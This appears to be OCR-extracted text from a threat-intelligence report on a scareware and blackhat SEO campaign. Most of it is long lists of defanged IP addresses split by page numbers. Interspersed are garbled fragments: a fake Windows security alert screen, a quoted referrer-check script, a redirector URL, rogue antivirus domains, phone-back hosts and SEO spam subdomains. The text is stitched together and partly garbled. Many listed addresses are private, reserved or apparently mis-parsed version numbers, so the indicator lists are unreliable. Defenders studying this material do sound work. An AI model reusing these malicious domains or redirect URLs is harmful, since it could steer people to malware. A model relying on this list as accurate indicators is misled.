hxxp://73.49.214.196 
hxxp://4.4.4.126 
hxxp://67.186.248.34 
hxxp://1.5.6.17 
hxxp://4.9.1.72 
hxxp://4.5.4.2 
hxxp://3.4.2.2 
hxxp://12.247.87.114 
hxxp://81.145.138.66 
hxxp://145.253.246.74 
hxxp://72.139.64.246 
hxxp://162.55.32.153 
hxxp://71.96.198.98 
hxxp://174.197.4.91 
hxxp://5.3.1.47 
hxxp://1.2.25.1 
hxxp://65.175.144.81 
hxxp://6.7.6.213 
hxxp://4.5.146.1 
hxxp://198.237.92.65 
hxxp://12.47.142.34 
hxxp://3.11.2.63 
hxxp://5.1.219.93 
hxxp://37.4.253.84 
hxxp://1.2.1.2 
hxxp://1.3.34.7 
hxxp://24.117.241.226 
hxxp://9.7.2.29 
hxxp://65.154.133.3 


22167 


hxxp://5.1.1.118 
hxxp://12.245.151.234 
hxxp://2.1.1.116 
hxxp://188.122.45.169 
hxxp://9.3.5.245 
hxxp://19.4.3.23 
hxxp://6.7.1.1 
hxxp://4.1.3.3 
hxxp://8.4.14.41 
hxxp://12.6.14.19 
hxxp://148.76.134.229 
hxxp://2.11.13.53 
hxxp://21.6.1.74 
hxxp://3.1.13.29 
hxxp://96.1.32.113 
hxxp://1.3.33.23 
hxxp://7.12.1.4 
hxxp://72.89.122.155 
hxxp://81.86.216.226 
hxxp://73.128.134.12 
hxxp://68.173.125.216 
hxxp://2.5.2.26 
hxxp://47.36.39.14 
hxxp://7.4.2.2 
hxxp://35.128.56.244 
hxxp://6.2.4.27 
hxxp://2.8.91.15 
hxxp://65.153.7.154 
hxxp://144.121.51.34 
hxxp://24.144.192.25 
hxxp://21.8.1.2 
hxxp://173.221.71.138 
hxxp://9.9.5.38 
hxxp://6.1.1.35 
hxxp://1.1.1.2 

22168 


hxxp://12.1.7.61 
hxxp://9.4.1.28 
hxxp://4.6.1.6 
hxxp://2.2.5.1 
hxxp://1.4.32.1 
hxxp://2.4.4.75 
hxxp://1.1.21.1 
hxxp://176.251.74.15 
hxxp://7.6.5.1 
hxxp://64.253.175.134 
hxxp://76.184.199.146 
hxxp://19.3.1.43 
hxxp://8.7.1.32 
hxxp://3.9.1.171 
hxxp://6.2.18.1 
hxxp://185.117.73.184 
hxxp://21.2.16.59 
hxxp://7.8.6.17 
hxxp://5.5.2.197 
hxxp://2.2.4.35 
hxxp://1.1.5.1 
hxxp://1.1.3.7 
hxxp://1.4.3.3 
hxxp://24.98.34.197 
hxxp://2.1.6.9 
hxxp://1.3.1.1 
hxxp://67.8.51.65 
hxxp://11.2.2.3 
hxxp://7.1.1.3 
hxxp://7.2.2.92 
hxxp://11.2.6.179 
hxxp://17.4.2.1 
hxxp://2.1.28.1 
hxxp://7.1.21.113 
hxxp://1.2.126.84 


22169 


hxxp://2.1.67.1 
hxxp://7.1.1.169 
hxxp://6.223.215.21 
hxxp://6.5.1.67 
hxxp://12.1.7.157 
hxxp://7.7.34.34 
hxxp://174.77.115.12 
hxxp://6.14.12.59 
hxxp://16.2.1.61 
hxxp://212.221.96.86 
hxxp://8.1.9.2 
hxxp://5.7.1.116 
hxxp://6.5.12.1 
hxxp://5.5.2.52 
hxxp://96.69.81.33 
hxxp://17.7.2.182 
hxxp://4.6.23.1 
hxxp://99.149.242.7 
hxxp://6.7.5.189 
hxxp://19.3.31.31 
hxxp://4.13.1.38 
hxxp://116.228.196.26 
hxxp://11.52.75.7 
hxxp://2.9.8.11 
hxxp://3.1.11.38 
hxxp://87.75.157.222 
hxxp://1.3.2.18 
hxxp://199.212.215.11 
hxxp://19.4.3.58 
hxxp://2.4.3.35 
hxxp://5.6.5.236 
hxxp://1.3.151.27 
hxxp://8.7.3.46 
hxxp://37.142.232.162 
hxxp://3.1.2.36 
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hxxp://71.233.64.217 
hxxp://5.5.4.26 
hxxp://3.8.1.23 
hxxp://5.3.2.138 
hxxp://1.9.7.27 
hxxp://12.11.4.15 
hxxp://11.9.1.55 
hxxp://172.241.224.132 
hxxp://4.5.2.157 
hxxp://72.28.227.166 
hxxp://4.2.41.27 
hxxp://6.2.5.2 


hxxp://162.211.146.146 


hxxp://67.216.25.2 
hxxp://6.7.4.43 
hxxp://1.7.4.3 
hxxp://3.3.2.18 
hxxp://6.4.1.59 
hxxp://131.94.122.155 
hxxp://1.31.1.122 
hxxp://17.12.1.26 
hxxp://2.8.3.3 
hxxp://8.11.7.41 
hxxp://2.2.3.57 
hxxp://8.11.9.45 
hxxp://3.2.1.2 
hxxp://8.11.7.4 
hxxp://3.97.2.2 
hxxp://2.7.1.111 
hxxp://71.199.175.93 
hxxp://4.5.41.23 
hxxp://24.248.184.226 
hxxp://2.1.28.63 
hxxp://3.1.19.214 
hxxp://3.1.17.213 


22171 


hxxp://96.35.155.242 
hxxp://1.1.4.223 
hxxp://1.6.2.4 
hxxp://9.5.14.172 
hxxp://5.4.2.41 
hxxp://65.34.28.218 
hxxp://71.218.35.48 
hxxp://1.31.36.23 
hxxp://1.1.12.1 
hxxp://1.1.6.1 
hxxp://73.195.47.51 
hxxp://216.99.112.66 
hxxp://72.188.174.113 
hxxp://45.14.195.52 
hxxp://19.2.17.55 
hxxp://1.3.36.6 
hxxp://1.2.14.135 
hxxp://72.194.17.66 
hxxp://1.1.1.56 
hxxp://71.136.225.36 
hxxp://69.119.7.21 
hxxp://95.179.219.68 
hxxp://3.3.14.231 
hxxp://21.1.21.45 
hxxp://21.1.19.1 
hxxp://98.253.74.121 
hxxp://67.166.178.198 
hxxp://174.18.37.196 
hxxp://76.91.67.2 
hxxp://96.58.19.194 
hxxp://2.3.69.53 
hxxp://76.119.238.229 
hxxp://24.181.18.56 
hxxp://68.132.188.79 


hxxp://24.186.88.139 
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System Tasks 
[Y) View system wtormanon 


US Add oF remove programs 


D change a settings 


™ Windows Security Alert 


To help protect your computer, Windows Web Security has 
) detected trojans and ready to remove them. 
p> 


tend drives Detected spyware and adware on your computer lense 
Other Places 
Rag ston GP soa @ Gj Admace.trajen 
yy My Network Places [A sserv. transponder. Trojan 
©) My Cocuments ri) /) Wstart. TrojanDewnloader 
© Swed Doaments 7 s\eeane ane 
a » 
D> Control Pane! *) pvORAMOme E) [ Remove all vit Careel 


(CIITITITIIIII III) titi) 
Scanning completed. 527 Potemtial aggressive behavior was found! 


Threats and actors 


Soyware & software, which can gather information from user's computer through 
Irhernet connection and send them bo Rs creator. Gathered information can be 
pasewords, etnal addresses and afl that data, which is mpertart for you 


Nene Rank level Cote Pies infected Sate 

@ teat-Wormwinsztet — Critical 11.58.2008 3s Wartng removal 
@ Emat-Wormwes2myd Critical 31. 38,2008 Watng removal 
@ Trojan-Downloader.win = Critical 21.28.2008 Ss} Watng temoval 


Description: 
‘The program is potentially dangerous for your system. Trojan-Oownloader stealing pasmecrds, credit cards and other 
Dersonal information from your computer 


Advice: 
You need to remove ts threst as soon as possible 


What follows is the usual referrer check "var refi,is _se=0; var se = new 
Array("google.","msn.","yahoo.","comcast.","aol.");" from where the user is redirected to 
liveavantbrowser2 .cn/go.php?id=2022 &key=4c69e59ac &p=1 (83.133.123.140) acting as 
central redirection point to the typosquatted portfolio of rogue security software domains. 


The original scareware domain vrusstatuscheck .com/1/?id=2022 &smersh=a9fd94859 
&back= %3DjQ51TTIMUQMMI %3DN - (69.4.230.204; 38.99.170.209; 78.47.172.66; 
78.47.91.153; 94.76.212.239; 94.102.48.28) is exposing the rest of the scareware ([6]detec- 
tion rate) portfolio with the following domains parked at these IPs: 


antivirusbestscannerv1 .com 
antivirus-powerful-scanv2 .com 
antivirus-powerful-scannerv2 .com 
virusinfocheck .com 
vrusstatuscheck .com 
adware-removal-tool .com 
lquickpcscanner .com 
lspywareonlinescanner .com 
lcomputeronlinescanner .com 
lbestprotectionscanner .com 
securityhelpcenter .com 
antivirus-online-pro-scan .com 
securedonlinecomputerscan .com 
antispywarepcscanner .com 
securedvirusscanner .com 
virusinfocheck .com 
antivirusbestscannervl1 .com 
antispywareupdateservice .com 
platinumsecurityupdate .com 
antispywareupdatesystem .com 
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hxxp://4.3.2.132 
hxxp://184.152.226.219 
hxxp://154.16.49.93 
hxxp://3.3.14.5 
hxxp://162.84.131.114 
hxxp://63.227.235.115 
hxxp://162.33.178.45 
hxxp://17.5.2.1 
hxxp://12.7.4.76 
hxxp://12.5.1.135 
hxxp://7.6.3.1 
hxxp://2.2.4.85 
hxxp://1.1.9.6 
hxxp://3.4.8.16 
hxxp://12.9.3.54 
hxxp://64.98.17.136 
hxxp://217.123.114.26 
hxxp://122.161.243.188 
hxxp://22.1.1.52 
hxxp://2.5.1.177 
hxxp://1.3.129.37 
hxxp://4.6.5.184 
hxxp://4.3.9.244 
hxxp://192.84.221.33 
hxxp://99.29.88.169 
hxxp://69.19.224.158 
hxxp://165.225.122.87 
hxxp://174.56.25.194 
hxxp://4.5.4.1 
hxxp://18.5.1.44 
hxxp://1.2.31.2 
hxxp://71.168.218.43 
hxxp://1.3.26.4 
hxxp://4.1.4.3 
hxxp://4.1.5.3 


22173 


hxxp://6.4.1.1 
hxxp://7.2.3.2 
hxxp://4.2.235.73 
hxxp://8.39.3.117 
hxxp://71.43.215.114 
hxxp://45.18.91.185 
hxxp://73.146.92.139 
hxxp://24.252.12.84 
hxxp://6.7.4.26 
hxxp://8.1.3.6 
hxxp://172.58.4.237 
hxxp://16.1.113.2 
hxxp://3.9.7.11 
hxxp://73.134.86.66 
hxxp://18.2.15.7 
hxxp://73.163.197.75 
hxxp://8.65.28.52 
hxxp://2.8.4.1 
hxxp://19.29.2.34 
hxxp://11.4.36.1 
hxxp://5.1.14.61 
hxxp://4.22.1.6 
hxxp://7.5.1.1 
hxxp://174.242.73.51 
hxxp://5.3.1.138 
hxxp://98.221.152.221 
hxxp://25.4.4.44 
hxxp://74.215.249.88 
hxxp://24.228.97.41 
hxxp://73.3.158.141 
hxxp://4.1.4.254 
hxxp://4.6.22.1 
hxxp://12.8.1.85 
hxxp://1.6.3.24 


hxxp://4.4.3.149 
22174 


hxxp://12.19.48.1 
hxxp://2.6.3.135 
hxxp://3.4.1.83 
hxxp://8.6.6.1 
hxxp://12.5.3.17 
hxxp://1.2.4.28 
hxxp://6.2.2.224 
hxxp://22.6.9.23 
hxxp://3.7.3.1 
hxxp://6.1.1.8 
hxxp://6.2.3.248 
hxxp://6.2.3.251 
hxxp://4.5.245.1 
hxxp://4.6.6.1 
hxxp://6.4.99.69 


hxxp://72.24.12.242 


hxxp://1.2.1.85 

hxxp://6.6.1.173 
hxxp://8.3.1.211 
hxxp://1.16.41.3 


hxxp://96.89.58.243 


hxxp://2.8.51.16 


hxxp://64.233.255.162 


hxxp://12.19.1.32 
hxxp://1.4.2.82 


hxxp://75.146.67.161 
hxxp://164.52.236.58 
hxxp://216.15.65.92 


hxxp://41.12.2.15 
hxxp://4.1.5.97 
hxxp://9.4.5.28 
hxxp://4.3.2.171 
hxxp://12.9.2.54 


hxxp://98.184.55.87 


hxxp://1.4.5.17 


22175 


hxxp://173.246.232.122 
hxxp://6.7.3.43 
hxxp://73.168.65.26 
hxxp://16.3.12.34 
hxxp://4.1.41.223 
hxxp://2.2.3.51 
hxxp://73.45.163.26 
hxxp://1.3.1.173 
hxxp://1.7.2.4 
hxxp://24.38.9.196 
hxxp://131.156.181.98 
hxxp://8.17.1.4 
hxxp://8.17.1.12 
hxxp://2.1.71.14 
hxxp://2.8.161.12 
hxxp://71.61.235.122 
hxxp://5.3.21.42 
hxxp://12.2.8.198 
hxxp://1.5.1.7 
hxxp://2.1.9.5 
hxxp://5.4.3.39 
hxxp://13.35.3.68 
hxxp://3.3.13.227 
hxxp://8.7.1.5 
hxxp://19.42.5.1 
hxxp://73.173.249.7 
hxxp://98.26.141.1 
hxxp://192.226.163.75 
hxxp://129.71.238.24 
hxxp://1.2.3.14 
hxxp://1.4.22.1 
hxxp://7.18.5.6 
hxxp://3.7.8.2 
hxxp://16.8.45.1 
hxxp://1.2.22.1 
22176 


hxxp://12.2.5.53 
hxxp://5.2.9.2 
hxxp://174.197.12.86 
hxxp://76.124.167.32 
hxxp://128.92.113.146 
hxxp://12.17.253.2 
hxxp://24.251.56.198 
hxxp://2.6.1.5 
hxxp://47.19.155.194 
hxxp://4.4.1.7 
hxxp://12.1.51.19 
hxxp://7.1.2.6 
hxxp://23.2.4.27 
hxxp://96.75.81.161 
hxxp://4.8.12.29 
hxxp://12.6.2.38 
hxxp://1.16.43.1 
hxxp://216.176.95.3 
hxxp://41.6.1.191 
hxxp://9.7.1.29 
hxxp://96.35.145.2 
hxxp://75.58.191.217 
hxxp://3.7.5.1 
hxxp://7.8.3.17 
hxxp://7.4.4.136 
hxxp://6.2.45.1 
hxxp://5.39.1.6 


hxxp://144.121.218.194 


hxxp://1.3.34.17 
hxxp://12.2.5.195 
hxxp://3.1.2.9 
hxxp://216.56.16.194 
hxxp://97.76.145.178 
hxxp://98.6.234.134 
hxxp://3.9.2.57 


22177 


hxxp://1.3.31.5 
hxxp://5.1.25.49 
hxxp://1.1.9.126 
hxxp://3.6.1.33 
hxxp://66.111.56.124 
hxxp://4.1.1.33 
hxxp://41.11.5.8 
hxxp://3.1.3.34 
hxxp://3.7.1.46 
hxxp://1.1.1.112 
hxxp://1.1.1.23 
hxxp://4.4.8.56 
hxxp://4.2.1.28 
hxxp://143.55.59.76 
hxxp://3.5.1.252 
hxxp://65.141.213.11 
hxxp://1.3.38.13 
hxxp://45.29.128.33 
hxxp://1.4.7.1 
hxxp://76.68.41.176 
hxxp://64.91.64.125 
hxxp://2.3.3.3 
hxxp://2.3.3.1 
hxxp://85.25.237.41 
hxxp://91.219.31.6 
hxxp://98.174.166.162 
hxxp://38.68.2.51 
hxxp://173.234.155.75 
hxxp://199.241.188.186 
hxxp://199.241.189.58 
hxxp://199.127.61.166 
hxxp://173.234.155.45 
hxxp://6.5.115.184 
hxxp://199.127.61.123 
hxxp://74.118.138.118 
22178 


hxxp://199.127.61.214 
hxxp://23.19.227.54 
hxxp://123.123.123.123 
hxxp://172.241.27.18 
hxxp://192.111.147.254 
hxxp://173.234.155.15 
hxxp://195.123.214.148 
hxxp://172.81.67.174 
hxxp://154.59.153.143 
hxxp://173.243.138.98 
hxxp://173.243.138.99 
hxxp://172.21.182.237 
hxxp://172.21.182.238 
hxxp://172.21.182.227 
hxxp://172.21.182.63 
hxxp://172.21.182.45 
hxxp://172.21.182.8 
hxxp://172.21.182.32 
hxxp://172.21.182.27 
hxxp://172.24.147.218 
hxxp://12.1.3.153 
hxxp://1.3.135.29 
hxxp://2.8.71.15 
hxxp://6.2.4.2 
hxxp://127.255.255.255 
hxxp://66.45.62.99 
hxxp://52.58.78.16 
hxxp://111.93.129.174 
hxxp://192.169.7.15 
hxxp://216.58.196.142 
hxxp://169.254.195.31 
hxxp://172.31.45.14 
hxxp://172.31.45.15 
hxxp://3.15.36.195 
hxxp://173.12.52.229 


22179 


hxxp://1.13.2.28 
hxxp://172.31.216.12 
hxxp://192.111.152.122 
hxxp://139.62.166.164 
hxxp://139.62.192.79 
hxxp://139.62.192.172 
hxxp://139.62.192.187 
hxxp://139.62.192.188 
hxxp://139.62.234.116 
hxxp://139.62.234.41 
hxxp://139.62.192.164 
hxxp://139.62.192.35 
hxxp://139.62.192.129 
hxxp://139.62.193.113 
hxxp://139.62.193.61 
hxxp://139.62.192.78 
hxxp://139.62.192.121 
hxxp://139.62.192.123 
hxxp://139.62.192.122 
hxxp://139.62.192.152 
hxxp://139.62.192.124 
hxxp://139.62.192.153 
hxxp://139.62.192.48 
hxxp://139.62.193.78 
hxxp://139.62.63.213 
hxxp://139.62.192.41 
hxxp://139.62.233.12 
hxxp://139.62.233.23 
hxxp://139.62.192.59 
hxxp://139.62.192.127 
hxxp://139.62.234.55 
hxxp://139.62.192.61 
hxxp://139.62.192.154 
hxxp://139.62.192.155 
hxxp://139.62.192.125 
22180 


hxxp://139.62.192.128 
hxxp://139.62.192.71 
hxxp://139.62.193.34 
hxxp://139.62.192.58 
hxxp://139.62.232.13 
hxxp://139.62.192.56 
hxxp://139.62.126.178 
hxxp://139.62.192.57 
hxxp://139.62.192.75 
hxxp://139.62.192.63 
hxxp://139.62.192.54 
hxxp://139.62.192.47 
hxxp://139.62.192.62 
hxxp://139.62.192.231 
hxxp://139.62.193.117 
hxxp://139.62.192.228 
hxxp://139.62.192.229 
hxxp://139.62.192.39 
hxxp://139.62.193.116 
hxxp://139.62.192.36 
hxxp://139.62.192.198 
hxxp://139.62.192.199 
hxxp://139.62.192.178 
hxxp://139.62.232.253 
hxxp://139.62.193.115 
hxxp://139.62.192.162 
hxxp://139.62.233.34 
hxxp://139.62.193.114 
hxxp://139.62.192.113 
hxxp://139.62.192.166 
hxxp://139.62.192.165 
hxxp://139.62.192.33 
hxxp://139.62.192.193 
hxxp://139.62.192.213 
hxxp://139.62.244.4 


22181 


hxxp://139.62.192.189 
hxxp://139.62.192.184 
hxxp://139.62.193.74 
hxxp://139.62.193.72 
hxxp://139.62.192.163 
hxxp://139.62.193.76 
hxxp://139.62.193.73 
hxxp://139.62.192.185 
hxxp://139.62.193.71 
hxxp://139.62.192.158 
hxxp://139.62.192.139 
hxxp://139.62.192.4 
hxxp://139.62.192.161 
hxxp://139.62.63.166 
hxxp://139.62.192.68 
hxxp://139.62.63.246 
hxxp://139.62.232.249 
hxxp://139.62.192.159 
hxxp://139.62.247.112 
hxxp://139.62.247.111 
hxxp://139.62.192.242 
hxxp://139.62.232.248 
hxxp://139.62.192.114 
hxxp://139.62.232.247 
hxxp://139.62.232.251 
hxxp://139.62.232.252 
hxxp://139.62.192.73 
hxxp://139.62.192.38 
hxxp://139.62.192.219 
hxxp://139.62.192.171 
hxxp://139.62.192.186 
hxxp://139.62.192.136 
hxxp://139.62.192.135 
hxxp://139.62.192.146 
hxxp://139.62.234.19 
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onlineupdatessystem .com 
softwareupdatessystem .com 
securedpaymentsystem .com 
infosecuritycenter .com 
antispywareproupdates .com 
securedsoftwareupdate .cn 
securedupdateslive .cn 
thankyouforinstall .cn 
securityupdatessystem .cn 
securedsystemresources .cn 
securedosupdates .cn 
windowssecurityupdates .cn 


Once executed it downloads Microsoft’s original thank you note 
(update.microsoft.com/windowsupdate/v6/thanks.aspx), and confirms the installation so 
that the blackhat SEO campaigners will receive a piece of the pie at securedliveuploads 
.com/?act=fb &1=0 &2=0 &3=kfddnffaffihlcoemdkedcaefcfaffedhfmdmboc &4=eebajf- 
jafekaifnbddghoclg &5=22 &6=1 &7=63 &8=31 &9=0 &10=1 


Related phone-back locations: 
liveavantbrowser2 .cn - (83.133.123.140) 
securedliveuploads .com 
liveavantbrowser2 .cn 
awardspacelooksbig .us 

crytheriver .biz 

softwareupdatessystem .com 
securedsoftwareupdate .cn 
securedupdateslive .cn 
securedosupdates .cn 


2221 


hxxp://139.62.233.27 
hxxp://139.62.193.5 
hxxp://139.62.192.133 
hxxp://172.18.65.99 
hxxp://139.62.193.9 
hxxp://139.62.234.24 
hxxp://139.62.192.126 
hxxp://139.62.193.8 
hxxp://139.62.192.32 
hxxp://139.62.192.112 
hxxp://139.62.234.23 
hxxp://139.62.192.134 
hxxp://139.62.192.132 
hxxp://139.62.63.186 
hxxp://139.62.192.67 
hxxp://139.62.193.45 
hxxp://139.62.192.66 
hxxp://139.62.63.11 
hxxp://139.62.192.246 
hxxp://139.62.193.42 
hxxp://139.62.234.96 
hxxp://139.62.193.41 
hxxp://139.62.193.43 
hxxp://139.62.193.7 
hxxp://139.62.234.64 
hxxp://139.62.193.3 
hxxp://139.62.193.1 
hxxp://139.62.193.6 
hxxp://139.62.192.223 
hxxp://139.62.193.37 
hxxp://139.62.234.29 
hxxp://139.62.193.2 
hxxp://139.62.192.34 
hxxp://139.62.193.44 
hxxp://139.62.232.12 


22183 


hxxp://139.62.193.11 
hxxp://139.62.193.16 
hxxp://139.62.193.38 
hxxp://139.62.234.121 
hxxp://139.62.193.4 
hxxp://139.62.192.9 
hxxp://139.62.234.61 
hxxp://139.62.193.29 
hxxp://139.62.193.39 
hxxp://139.62.192.81 
hxxp://139.62.233.16 
hxxp://139.62.233.13 
hxxp://139.62.59.113 
hxxp://139.62.58.236 
hxxp://139.62.59.172 
hxxp://139.62.58.7 
hxxp://139.62.59.79 
hxxp://139.62.59.116 
hxxp://139.62.59.213 
hxxp://139.62.58.67 
hxxp://139.62.57.184 
hxxp://139.62.57.113 
hxxp://139.62.59.234 
hxxp://139.62.59.112 
hxxp://139.62.58.81 
hxxp://139.62.58.47 
hxxp://139.62.58.117 
hxxp://139.62.59.117 
hxxp://139.62.58.193 
hxxp://139.62.58.97 
hxxp://139.62.58.72 
hxxp://139.62.58.75 
hxxp://139.62.59.135 
hxxp://139.62.58.68 
hxxp://139.62.58.223 
22184 


hxxp://139.62.57.232 
hxxp://139.62.59.99 
hxxp://139.62.59.35 
hxxp://139.62.57.216 
hxxp://139.62.57.19 
hxxp://139.62.59.223 
hxxp://139.62.57.66 
hxxp://139.62.57.152 
hxxp://139.62.58.86 
hxxp://139.62.134.212 
hxxp://139.62.58.215 
hxxp://139.62.58.43 
hxxp://139.62.59.97 
hxxp://139.62.57.129 
hxxp://139.62.59.19 
hxxp://139.62.58.99 
hxxp://139.62.58.144 
hxxp://139.62.59.71 
hxxp://139.62.59.92 
hxxp://139.62.57.212 
hxxp://139.62.57.49 
hxxp://139.62.58.118 
hxxp://139.62.59.15 
hxxp://139.62.59.127 
hxxp://139.62.57.191 
hxxp://139.62.57.11 
hxxp://139.62.59.165 
hxxp://139.62.58.243 
hxxp://139.62.58.216 
hxxp://139.62.58.135 
hxxp://139.62.57.44 
hxxp://139.62.58.51 
hxxp://139.62.58.231 
hxxp://139.62.59.16 
hxxp://139.62.59.251 


22185 


hxxp://139.62.58.153 
hxxp://139.62.59.212 
hxxp://139.62.57.23 
hxxp://139.62.58.225 
hxxp://139.62.58.221 
hxxp://139.62.59.34 
hxxp://139.62.57.27 
hxxp://139.62.59.192 
hxxp://139.62.57.82 
hxxp://139.62.57.157 
hxxp://139.62.57.52 
hxxp://139.62.58.74 
hxxp://139.62.57.182 
hxxp://139.62.57.69 
hxxp://139.62.58.177 
hxxp://139.62.58.48 
hxxp://139.62.59.75 
hxxp://139.62.58.237 
hxxp://139.62.59.232 
hxxp://139.62.57.56 
hxxp://139.62.57.13 
hxxp://139.62.58.93 
hxxp://139.62.59.236 
hxxp://139.62.59.161 
hxxp://139.62.59.17 
hxxp://139.62.58.245 
hxxp://139.62.57.118 
hxxp://139.62.57.227 
hxxp://139.62.59.229 
hxxp://139.62.59.87 
hxxp://139.62.59.86 
hxxp://139.62.59.124 
hxxp://139.62.59.31 
hxxp://139.62.59.14 
hxxp://139.62.59.198 
22186 


hxxp://139.62.58.244 
hxxp://139.62.57.116 
hxxp://139.62.59.174 
hxxp://139.62.59.222 
hxxp://139.62.58.46 
hxxp://139.62.58.195 
hxxp://139.62.59.25 
hxxp://139.62.57.36 
hxxp://139.62.59.243 
hxxp://139.62.59.237 
hxxp://139.62.59.141 
hxxp://139.62.57.214 
hxxp://139.62.58.15 
hxxp://139.62.58.23 
hxxp://139.62.58.29 
hxxp://139.62.58.45 
hxxp://139.62.58.62 
hxxp://139.62.58.84 
hxxp://139.62.58.95 
hxxp://139.62.58.89 
hxxp://139.62.58.87 
hxxp://139.62.58.98 
hxxp://139.62.58.85 
hxxp://139.62.58.94 
hxxp://139.62.58.115 
hxxp://139.62.58.124 
hxxp://139.62.58.126 
hxxp://139.62.58.127 
hxxp://139.62.58.146 
hxxp://139.62.58.151 
hxxp://139.62.58.152 
hxxp://139.62.58.162 
hxxp://139.62.58.188 
hxxp://139.62.58.198 
hxxp://139.62.58.212 


22187 


hxxp://139.62.58.226 
hxxp://139.62.58.229 
hxxp://139.62.58.252 
hxxp://139.62.66.77 
hxxp://52.97.133.216 
hxxp://216.171.94.67 
hxxp://13.35.193.39 
hxxp://52.112.193.13 
hxxp://216.171.94.39 
hxxp://216.171.94.44 
hxxp://216.171.94.93 
hxxp://216.171.94.95 
hxxp://216.171.94.96 
hxxp://216.171.94.133 
hxxp://172.24.2.8 
hxxp://23.19.227.186 
hxxp://34.233.187.38 
hxxp://98.143.95.83 
hxxp://64.139.73.173 
hxxp://172.217.4.238 
hxxp://45.128.156.27 
hxxp://52.97.141.88 
hxxp://52.112.192.139 
hxxp://66.228.239.132 
hxxp://66.228.239.133 
hxxp://66.228.239.137 
hxxp://66.228.239.151 
hxxp://66.228.239.157 
hxxp://4.2.4.154 
hxxp://6.1.1.28 
hxxp://192.254.69.178 
hxxp://172.25.168.125 
hxxp://65.162.42.254 
hxxp://65.162.42.252 
hxxp://65.162.42.251 
22188 


hxxp://65.162.42.242 
hxxp://65.162.42.197 
hxxp://63.219.151.12 
hxxp://65.162.42.135 
hxxp://65.162.42.173 
hxxp://65.162.42.195 
hxxp://65.162.42.198 
hxxp://65.162.42.222 
hxxp://65.162.42.241 
hxxp://65.162.42.246 
hxxp://65.162.42.249 
hxxp://216.252.195.128 
hxxp://172.22.245.162 
hxxp://172.22.245.137 
hxxp://172.22.198.11 
hxxp://172.25.168.64 
hxxp://172.25.168.113 
hxxp://198.61.195.78 
hxxp://172.25.168.89 
hxxp://172.17.112.1 
hxxp://46.34.1.2 
hxxp://66.228.239.136 
hxxp://172.17.6.9 
hxxp://172.17.6.7 
hxxp://172.17.9.6 
hxxp://172.17.9.7 
hxxp://172.17.9.39 
hxxp://172.17.8.254 
hxxp://169.254.32.72 
hxxp://169.254.113.11 
hxxp://169.254.196.198 
hxxp://23.81.246.16 
hxxp://64.187.238.58 
hxxp://1.21.2.1 
hxxp://192.198.81.122 
22189 


hxxp://66.161.144.31 
hxxp://192.111.152.138 
hxxp://192.254.76.214 
hxxp://133.1.11.173 
hxxp://192.111.151.198 
hxxp://195.123.213.122 
hxxp://173.232.146.32 
hxxp://98.191.94.98 
hxxp://52.96.69.56 
hxxp://3.215.239.59 
hxxp://72.167.218.45 
hxxp://35.174.78.146 
hxxp://52.112.65.78 
hxxp://52.112.67.51 
hxxp://96.248.123.99 
hxxp://199.241.189.38 
hxxp://255.255.255.252 
hxxp://199.241.189.37 
hxxp://8.8.4.4 
hxxp://64.244.144.91 
hxxp://199.241.189.36 
hxxp://199.241.189.39 
hxxp://192.111.154.74 
hxxp://172.98.197.98 
hxxp://192.111.145.218 
hxxp://192.111.149.26 
hxxp://45.91.11.22 
hxxp://2.56.115.39 
hxxp://145.91.11.22 
hxxp://62.96.194.146 
hxxp://179.43.176.133 
hxxp://168.119.77.163 
hxxp://72.73.77.9 
hxxp://82.69.71.9 
hxxp://82.65.84.9 
22190 


hxxp://185.212.129.112 
hxxp://172.31.255.255 
hxxp://172.22.9.18 
hxxp://172.22.9.5 
hxxp://172.22.9.3 
hxxp://172.22.9.17 
hxxp://172.22.9.196 
hxxp://172.22.9.2 
hxxp://172.22.9.24 
hxxp://172.22.9.9 
hxxp://69.84.159.94 
hxxp://172.96.143.178 
hxxp://192.254.79.154 
hxxp://172.22.9.58 
hxxp://65.74.138.197 
hxxp://172.82.162.66 
hxxp://5.199.174.223 
hxxp://199.192.183.66 
hxxp://172.24.36.6 
hxxp://172.22.26.173 
hxxp://89.41.182.28 
hxxp://5.181.156.69 
hxxp://194.135.33.241 
hxxp://74.119.217.58 
hxxp://85.237.217.157 
hxxp://185.163.45.17 
hxxp://194.135.33.12 
hxxp://185.99.133.137 
hxxp://194.15.112.174 
hxxp://51.89.128.195 
hxxp://64.44.139.45 
hxxp://89.41.182.21 
hxxp://172.83.155.132 
hxxp://45.95.186.118 
hxxp://194.15.112.173 


22191 


hxxp://51.89.128.193 
hxxp://192.99.255.47 
hxxp://64.44.139.41 
hxxp://194.36.188.24 
hxxp://185.183.96.36 
hxxp://185.163.45.132 
hxxp://155.133.16.199 
hxxp://168.119.54.228 
hxxp://213.59.119.198 
hxxp://185.163.47.176 
hxxp://139.28.235.26 
hxxp://5.255.255.5 
hxxp://77.88.55.55 
hxxp://85.25.217.84 
hxxp://1.2.3.255 
hxxp://162.76.2.1 
hxxp://1.5.7.9 
hxxp://63.141.224.42 
hxxp://3.128.1.29 
hxxp://216.244.83.226 
hxxp://216.144.236.212 
hxxp://185.25.51.99 
hxxp://88.119.175.97 
hxxp://62.75.216.38 
hxxp://88.119.175.222 
hxxp://217.172.179.14 
hxxp://3.128.1.1 
hxxp://3.128.222.222 
hxxp://185.244.149.47 
hxxp://188.227.59.21 
hxxp://93.189.42.83 
hxxp://62.113.119.119 
hxxp://46.4.167.227 
hxxp://36.68.95.228 
hxxp://182.253.123.52 
22192 


System scan progress 


CJ Shared Documents CJ My Documents 


Hard drives 
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Now scanning: ipconfig.ene 


Narre Rest bevet Cate Files infected 


Blackhat SEO subdomains at the free web site hosting services: 


2qnews.07x .net 
2rnews.07x .net 
Inews.07x .net 
1knews.07x .net 
1xnews.07x .net 
gerandong.07x .net 
kort.07x .net 
30newsx.07x .net 
4dnews.07x .net 
4dnews.07x .net 
laptop.07x .net 
30newsf.07x .net 


Blackhat SEO domains participating in the second multi-theme campaign: 


Olmay2009 .us 
mi1im18test .us 
mim17test .us 
ml1m2Itest .us 
mlim1l1test .us 
mim16test .us 
ml1m20test .us 
mim15test .us 


2222 


hxxp://36.69.136.238 
hxxp://125.165.227.51 
hxxp://182.253.88.153 
hxxp://36.79.218.135 
hxxp://117.254.62.253 
hxxp://117.212.94.124 
hxxp://125.163.175.91 
hxxp://185.25.51.2 
hxxp://185.212.47.173 
hxxp://185.25.48.166 
hxxp://173.232.146.199 
hxxp://173.232.146.72 
hxxp://66.42.113.88 
hxxp://194.76.224.61 
hxxp://79.143.31.167 
hxxp://91.235.129.241 
hxxp://36.73.152.96 
hxxp://36.73.152.146 
